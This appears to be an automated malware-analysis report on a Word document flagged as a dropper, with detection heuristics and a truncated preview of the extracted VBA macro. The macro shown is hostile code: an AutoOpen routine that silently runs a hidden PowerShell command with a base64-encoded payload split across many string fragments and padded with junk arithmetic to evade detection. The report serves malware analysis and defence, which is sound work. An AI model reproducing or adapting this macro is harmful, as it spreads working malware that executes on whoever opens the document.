Verdict: MALICIOUS
Risk score: 242

Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6555924-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6555924-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17189 bytes |

SHA-256: 7f6940c0df7155d321ba508c1294cadbed87eaad5e013d60a421649816173a32

Preview script: first 1,000 lines of the extracted script (truncated)
```vba
Attribute VB_Name = "SIENVrpqsEzaR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NTDpKIPNr()
On Error Resume Next
CRtCR = kvJpp - Cos(CBtDHb) * 1 - Chr(48747) / 18555 - ChrB(ICjSJ)
FqlYV = 9412
lhHnjj = mSiZSK - Cos(jSCYlB) * 1 - Chr(66815) / 88474 - ChrB(JjIGi)
YRUWS = 31326
NTDpKIPNr = kwMZBuC + IUXizuBmja + wvQmuaJ + nBFqnwDUcKn + MhMNHln + vTizN + YubADWTq + ZOlKRIzcQfJ + DzITv + DcoYUfaIKm
wUvpL = qTKAwV - Cos(XizjD) * 1 - Chr(3454) / 84020 - ChrB(wDXdS)
uRFvrP = 45002
End Function
Sub Autoopen()
On Error Resume Next
icvpC = vzjKl - Cos(jpRkS) * 1 - Chr(31730) / 47306 - ChrB(zQXMsw)
CEEGFz = 1865
adDibd (NTDpKIPNr)
XnOzn = wTNrK - Cos(FzUcb) * 1 - Chr(83295) / 57625 - ChrB(RFjwD)
tufDj = 18187
End Sub
Function adDibd(EIoMGp)
On Error Resume Next
puzEQk = wzJVi - Cos(qCkbfO) * 1 - Chr(40596) / 53801 - ChrB(RERwfd)
oKLAV = 30243
XYKGH = UvOOGR - Cos(JEXSoD) * 1 - Chr(13889) / 55611 - ChrB(mUFtuI)
KhbazN = 5512
kZIrcrZiz = Shell(bFqQBzIGwC + Chr(vbKeyP) + jTOXNP + EIoMGp, vbHide)
HNBNW = DqOmuk - Cos(sMRIci) * 1 - Chr(72015) / 81525 - ChrB(NfLwE)
iqtwBD = 20908
End Function
Attribute VB_Name = "BtGDjiqGzYM"
Function kwMZBuC()
On Error Resume Next
wrcPok = DCERqK - Cos(brVBUz) * 1 - Chr(71813) / 78175 - ChrB(GtTRXP)
NNcZO = 54015
iirsI = "owersHeLL -Wi" + "nDowsTyle hidde" + "n -e KAAo" + "ACIAewAxADMAOQB" + "9AHsANgB9AHsAOQ" + "AxAH0AewA3ADQ" + "AfQB7ADEAMQA"
XqbmD = AzkIlG - Cos(zzszvK) * 1 - Chr(88203) / 40761 - ChrB(USVot)
EOkTzq = 97241
CTDUX = "wAH0AewAyADkAf" + "QB7ADgAMwB" + "9AHsAMg" + "A2AH0AewA" + "4AH0AewA5ADA"
sLhoz = JKfQd - Cos(NVcdE) * 1 - Chr(65811) / 60785 - ChrB(WIQPG)
uWXSH = 92438
PjiBpTndO = "AfQB7AD" + "EAMQAxAH0AewAxA" + "H0AewA5ADMAf" + "QB7ADEAMAA5A" + "H0AewAxADQAM"
pzoNVw = MJmEL - Cos(dilHPR) * 1 - Chr(20661) / 95134 - ChrB(kuSioM)
nNJjMX = 42850
PaDGQOL = "wB9AH" + "sAOAAwAH0A" + "ewA2ADMAfQ" + "B7ADgAM" + "QB9AHsAOAA2AH" + "0AewAxADIA" + "MAB9AHsAO" + "QA2AH0AewA" + "4ADcAfQB7ADI" + "ANAB9AHsAMQ"
PilSoM = MEYfM - Cos(QCplBB) * 1 - Chr(28130) / 88996 - ChrB(nIAZWZ)
iUGMzr = 63393
mAcjiCjdpNS = "AzADcAfQ" + "B7ADkAN" + "QB9AHsAMQAxADY" + "AfQB7ADYAMQB" + "9AHsAMQAyADUA" + "fQB7ADE" + "AMwAzAH0AewAxAD" + "AAMwB9AHsANA"
sJbPiO = IACWK - Cos(vLVHt) * 1 - Chr(39623) / 90698 - ChrB(ROpwRa)
YznZV = 20327
sGNLuO = "A1AH0Ae" + "wA2ADkAfQB7ADQ" + "AfQB7ADEA" + "MwB9A" + "HsAMgA3A"
sazMhd = zXAOai - Cos(kEDWl) * 1 - Chr(3027) / 51634 - ChrB(mSQnFj)
OzoJC = 36939
fpcPzDIA = "H0AewAx" + "ADIAMgB9AHsANAA" + "yAH0A" + "ewA3AD" + "UAfQB7" + "ADEAMwA1AH0" + "AewA0ADcAfQB7A"
IhnRiS = phqruo - Cos(kCkIRz) * 1 - Chr(76683) / 62999 - ChrB(tYPwJD)
Rfqpw = 42093
tiYGpkw = "DEAMgA4AH0Aew" + "A1ADMAfQB7ADYAN" + "wB9AHsAMQA0ADAA" + "fQB7ADEAMQA5A"
UWIEzl = wKvGi - Cos(EAkWHb) * 1 - Chr(72417) / 89269 - ChrB(PThlHY)
EwzOT = 29934
CDnuOJAz = "H0AewA2ADIAfQB" + "7ADUANQB9AHs" + "AMQAzA" + "DQAfQB" + "7ADMAMAB9AHsAMw" + "AzAH0AewA" + "5ADkAfQB7ADEAMA" + "A2AH0AewA"
kwMZBuC = iirsI + CTDUX + PjiBpTndO + PaDGQOL + mAcjiCjdpNS + sGNLuO + fpcPzDIA + tiYGpkw + CDnuOJAz
End Function
Function IUXizuBmja()
On Error Resume Next
JsqvWz = TriJU - Cos(uThVk) * 1 - Chr(78133) / 53163 - ChrB(pXLdA)
FwIQap = 27018
WPJiHWJRsKt = "xADIANAB" + "9AHsAMQ" + "AwADQAfQB" + "7ADEAMgA3AH0" + "AewA5ADIAfQ"
dQfPzi = cCcmHR - Cos(Rcdfni) * 1 - Chr(38405) / 39757 - ChrB(SVNHWi)
ifDSp = 32449
VjtHBPEwWE = "B7ADUANwB9" + "AHsAMgA1AH0" + "AewAzADgAf" + "QB7ADEAN" + "AB9AHsAM" + "gA4AH0Aew" + "AxADkAfQB7ADE"
UrwLNU = qtSVfj - Cos(vBjHJm) * 1 - Chr(26511) / 88605 - ChrB(XZtotH)
wuAmJ = 76673
wNKXRkFQiE = "ANQB9AH" + "sAMgB9AHsAMQAwA" + "DEAfQB7" + "ADkANwB9" + "AHsAMQAz" + "ADEAfQB7ADEAM" + "wA4AH0Aew"
TGzvbb = mqBbni - Cos(Ljiba) * 1 - Chr(14165) / 49309 - ChrB(TfpjqT)
fudHKP = 1800
cqcNkUIMR = "AxADMANg" + "B9AHsAMQAxAH0Ae" + "wA1AH0AewA3AD" + "EAfQB7ADEAMQA0" + "AH ... (truncated)
```